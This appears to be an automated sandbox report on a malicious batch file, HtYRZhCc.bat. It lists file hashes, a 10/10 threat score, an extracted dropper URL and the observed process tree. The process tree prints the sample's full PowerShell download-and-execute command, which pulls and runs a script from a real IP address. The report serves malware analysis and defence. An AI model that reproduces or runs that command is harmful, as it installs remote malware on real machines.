Analysis
-
max time kernel
105s -
max time network
142s -
platform
windows10_x64 -
resource
win10v200217 -
submitted
01-03-2020 04:10
Static task
static1
Behavioral task
behavioral1
Sample
HtYRZhCc.bat
Resource
win7v200217
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
HtYRZhCc.bat
Resource
win10v200217
windows10_x64
0 signatures
0 seconds
General
-
Target
HtYRZhCc.bat
-
Size
189B
-
MD5
d0eafb36abcfd1c15e9bef86bcf280b0
-
SHA1
c4c71e785acaa2543c8ff32db8dbbf49761b78dd
-
SHA256
2f8423a9b51942cea3d3e71e185c4e5780a8dc51cfc5fc0d84d08ad9efe067a5
-
SHA512
f75e1a19ca43ab9fbb7e99cdebce8ceca51922258cff04724e811eecfee88a050b1c496580a498ecc845c67abf7ce14b37bf80c0f4fd9d5c300d4bff1b8c9cd5
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://185.103.242.78/pastes/HtYRZhCc
Signatures
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 3524 4056 WerFault.exe powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
WerFault.exedescription pid process Token: SeRestorePrivilege 3524 WerFault.exe Token: SeBackupPrivilege 3524 WerFault.exe Token: SeDebugPrivilege 3524 WerFault.exe -
Suspicious behavior: EnumeratesProcesses 14 IoCs
Processes:
WerFault.exepid process 3524 WerFault.exe 3524 WerFault.exe 3524 WerFault.exe 3524 WerFault.exe 3524 WerFault.exe 3524 WerFault.exe 3524 WerFault.exe 3524 WerFault.exe 3524 WerFault.exe 3524 WerFault.exe 3524 WerFault.exe 3524 WerFault.exe 3524 WerFault.exe 3524 WerFault.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\HtYRZhCc.bat"1⤵PID:4020
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/HtYRZhCc');Invoke-HELKUY;Start-Sleep -s 10000"2⤵PID:4056
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4056 -s 7043⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:3524